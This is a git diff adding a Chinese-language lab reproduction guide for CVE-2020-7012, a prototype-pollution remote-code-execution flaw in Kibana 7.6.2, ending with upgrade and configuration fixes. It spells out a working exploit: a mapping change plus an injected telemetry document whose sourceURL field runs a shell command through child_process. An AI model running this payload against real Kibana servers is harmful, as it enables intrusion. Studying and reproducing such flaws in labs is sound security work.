diff --git a/Web应用漏洞/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012.md b/Web应用漏洞/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012.md new file mode 100644 index 0000000..b1851d9 --- /dev/null +++ b/Web应用漏洞/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012.md @@ -0,0 +1,161 @@ +# Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012 + +## 漏洞描述 + +Kibana 是 Elasticsearch 的开源数据可视化仪表盘工具。 + +Kibana 6.7.0 至 6.8.8 版本以及 7.0.0 至 7.6.2 版本中的 Upgrade Assistant 功能存在原型污染漏洞。具有 Kibana 索引写入权限的认证用户可以插入恶意数据,导致 Kibana 执行任意代码。攻击者可能利用此漏洞以 Kibana 进程的权限在主机系统上执行代码。 + +参考链接: + +- https://hackerone.com/reports/852613 +- https://discuss.elastic.co/t/elastic-stack-6-8-9-and-7-7-0-security-update/235571 +- https://nvd.nist.gov/vuln/detail/CVE-2020-7012 + +## 漏洞影响 + +``` +ElasticSearch Kibana >=6.7.0,<=6.8.8 +ElasticSearch Kibana >=7.0.0,<=7.6.2 +``` + +## 环境搭建 + +Vulhub 启动 Kibana 7.6.2 和 Elasticsearch 7.6.2: + +```shell +docker compose up -d +``` + +环境启动后,访问 `http://your-ip:5601` 即可看到 Kibana 的默认首页。 + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311093003031.png) + +## 漏洞复现 + +远程代码执行漏洞发生在 Kibana 从 Elasticsearch 读取带有 `upgrade-assistant-telemetry` 属性的保存对象时。你可以通过直接向 Elasticsearch 发送数据或通过 Kibana 提交查询来利用此漏洞。代码执行将在 Kibana 重启后或数据收集时(具体时间未知)发生。 + +首先进入 Kibana UI 的开发者工具(URL 为 `http://your-ip:5601/app/kibana#/dev_tools/console`),然后发送以下请求来修改 Kibana 映射,以允许自定义的 `upgrade-assistant-telemetry` 文档: + +```json +PUT /.kibana_1/_mappings +{ + "properties": { + "upgrade-assistant-telemetry": { + "properties": { + "constructor": { + "properties": { + "prototype": { + "properties": { + "sourceURL": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + } + } + } + } + }, + "features": { + "properties": { + "deprecation_logging": { + "properties": { + "enabled": { + "type": "boolean", + "null_value": true + } + } + } + } + }, + "ui_open": { + "properties": { + "cluster": { + "type": "long", + "null_value": 0 + }, + "indices": { + "type": "long", + "null_value": 0 + }, + "overview": { + "type": "long", + "null_value": 0 + } + } + }, + "ui_reindex": { + "properties": { + "close": { + "type": "long", + "null_value": 0 + }, + "open": { + "type": "long", + "null_value": 0 + }, + "start": { + "type": "long", + "null_value": 0 + }, + "stop": { + "type": "long", + "null_value": 0 + } + } + } + } + } + } +} +``` + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311103327247.png) + +然后发送第二个请求来注入恶意的 telemetry 文档: + +```json +PUT /.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry +{ + "upgrade-assistant-telemetry": { + "ui_open.overview": 1, + "ui_open.cluster": 1, + "ui_open.indices": 1, + "constructor.prototype.sourceURL": "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('touch /tmp/awesome_poc')" + }, + "type": "upgrade-assistant-telemetry", + "updated_at": "2020-04-17T20:47:40.800Z" +} +``` + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311102813742.png) + +最后,你需要等待一段时间让 payload 执行。如果不想等待,可以通过 `docker compose restart kibana` 重启 Kibana 服务器,恶意代码将在服务重启后执行。 + +命令将在服务重启后执行: + +``` +docker compose exec kibana ls -al /tmp +``` + +![](images/Kibana%207.6.2%20upgrade-assistant-telemetry%20原型污染导致远程代码执行%20CVE-2020-7012/image-20250311103144864.png) + +**重要提示:漏洞利用后,Kibana 将崩溃且无法启动。你需要从 ElasticSearch 中删除 `.kibana_1` 索引才能恢复功能。** + +删除 `.kibana_1` 并重启服务: + +``` +docker compose exec elasticsearch curl -XDELETE http://localhost:9200/.kibana_1 +docker compose restart kibana +``` + +## 漏洞修复 + +用户应升级到 Kibana 版本 7.7.0 或 6.8.9。无法升级的用户可按照以下说明禁用升级助手: + +- Kibana 版本 6.7.0 和 6.7.1 可以在 `kibana.yml` 文件中设置 `upgrade_assistant.enabled: false` +- Kibana 版本从 6.7.2 开始,可以在 `kibana.yml` 文件中设置 `xpack.upgrade_assistant.enabled: false` diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311093003031.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311093003031.png new file mode 100644 index 0000000..1574e61 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311093003031.png differ diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311102813742.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311102813742.png new file mode 100644 index 0000000..a5de384 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311102813742.png differ diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103144864.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103144864.png new file mode 100644 index 0000000..b1dee32 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103144864.png differ diff --git a/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103327247.png b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103327247.png new file mode 100644 index 0000000..bf37b29 Binary files /dev/null and b/Web应用漏洞/images/Kibana 7.6.2 upgrade-assistant-telemetry 原型污染导致远程代码执行 CVE-2020-7012/image-20250311103327247.png differ